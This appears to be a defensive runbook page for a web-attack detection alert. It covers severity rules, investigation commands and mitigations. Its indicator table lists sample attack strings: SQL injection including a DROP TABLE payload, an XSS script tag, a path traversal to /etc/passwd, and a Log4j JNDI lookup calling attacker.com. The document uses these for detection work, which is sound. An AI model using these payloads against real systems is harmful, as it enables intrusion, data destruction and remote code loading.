Suspicious Query Detection
Alert ID: suspicious_query
MITRE ATT&CK: T1190 – Exploit Public-Facing Application
Severity / Criticality
Section titled “Severity / Criticality”| Level | Condition |
|---|---|
| Medium | XSS patterns, 2–3 detections |
| High | Multiple XSS, path traversal, LDAP injection |
| Critical | SQL injection, code execution, XXE, flood (≥5 queries in 30 s) |
Why is it considered malicious?
Section titled “Why is it considered malicious?”- SQLi: full database access and manipulation.
- RCE: remote code execution.
- XSS: session theft, defacement, or phishing.
- Path traversal: access to sensitive files.
- LDAP/XXE: attacks against internal services.
- Flood: DoS or automated exploitation.
When does the alert trigger?
Section titled “When does the alert trigger?”- Real-time analysis of GET / POST / COOKIE / URI / Headers.
- Flood: ≥5 malicious queries in 30 seconds, with a 5-minute cooldown.
- Pattern detection using 200+ regexes across 6 categories.
- SQL examples:
UNION SELECT,OR 1=1,benchmark(),sleep().
Technical Indicators (IOCs)
Section titled “Technical Indicators (IOCs)”| Type | Pattern |
|---|---|
log_pattern — Classic SQL | ' OR '1'='1 |
log_pattern — XSS | "><script>alert(1)</script> |
log_pattern — Path traversal | ../../../../../../etc/passwd |
log_pattern — SQL drop | '; DROP TABLE users-- |
log_pattern — Log4j | ${jndi:ldap://attacker.com/a} |
Common false positives
Section titled “Common false positives”- Requests from development tools or authorized penetration testing.
- Security plugins that run tests.
- Legitimate post content, such as code snippets.
- Misconfigured indexing bots that generate floods.
Investigation steps
Section titled “Investigation steps”-
Extract attacker requests:
Terminal window grep "IP_ADDRESS" access.log | tail -100 -
Search for vectors:
Terminal window grep -E "UNION|SELECT|<script|eval" access.log -
Check whether payloads succeeded by comparing response codes and sizes.
-
For floods, identify User-Agent and pattern; correlate with WAF/IDS.
-
If there are signs of exploitation, export logs and preserve evidence.
Recommended mitigations
Section titled “Recommended mitigations”=== “Immediate”
!!! danger "" - Block the IP in the WAF/firewall. - Apply aggressive rate limiting to the suspicious source. - Review and revert database or file changes if exploitation succeeded. - Enable deep payload inspection in the WAF.=== “Preventive”
!!! tip "" - Use a WAF with OWASP CRS and SQLi/XSS/XXE-specific rules. - Use prepared statements and ORM patterns in custom code. - Apply strict input validation and sanitization. - Use Content Security Policy to reduce XSS impact. - Configure Fail2ban/jails for detected patterns.References
Section titled “References”- OWASP Top 10 (A03:2021 XSS/Injection)
- ModSecurity CRS
- SQLMap and web-exploitation detection guides